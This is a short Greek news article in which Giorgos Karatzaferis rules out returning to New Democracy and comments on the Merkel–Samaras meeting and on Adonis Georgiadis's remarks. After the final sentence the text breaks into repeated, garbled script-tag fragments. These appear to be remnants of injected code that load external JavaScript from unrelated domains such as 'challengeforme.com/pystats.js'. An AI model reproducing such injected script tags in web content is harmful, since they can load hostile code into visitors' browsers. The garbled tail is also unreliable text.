Αποκλείει την επιστροφή στη Ν.Δ. ο Καρατζαφέρης

Καρατζαφέρης: Δεν επιστρέφω στη ΝΔ

«Με αυτή την πολιτική στο τέλος θα μείνουν μόνοι τους»

«Το ανέκδοτο αυτό επαναλαμβανόμενο δεν βγάζει γέλιο», απάντησε ο Γιώργος Καρατζαφέρης όταν ρωτήθηκε την Τετάρτη για το ενδεχόμενο επιστροφής του στη Νέα Δημοκρατία.

«Αυτή τη στιγμή, δεν εξυπηρετεί ούτε την Ελλάδα ούτε τη ΝΔ και πολύ περισσότερο εμάς, ένα τέτοιο ενδεχόμενο. Για αλλαγή πολιτικής, όπως προτείνω, εμείς είμαστε εδώ. Με αυτή την πολιτική, στο τέλος θα μείνουν μόνοι τους», σημείωσε, μιλώντας το πρωί στον ΑΝΤ1.

Ο πρόεδρος του ΛΑΟΣ αναφέρθηκε και στη χθεσινή συνάντηση της Άγκελα Μέρκελ με τον Αντώνη Σαμαρά στο Βερολίνο, σχολιάζοντας ότι δεν μπορεί να είναι ευχαριστημένος με τη συνάντηση αυτή.

Σχετικά με τις χθεσινές δηλώσεις του κοινοβουλευτικού εκπροσώπου της ΝΔ, Άδωνι Γεωργιάδη, ότι αν πέσει η κυβέρνηση, θα πάρει τα λεφτά του από την Ελλάδα, έκανε λόγο για επικίνδυνη παρότρυνση του.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >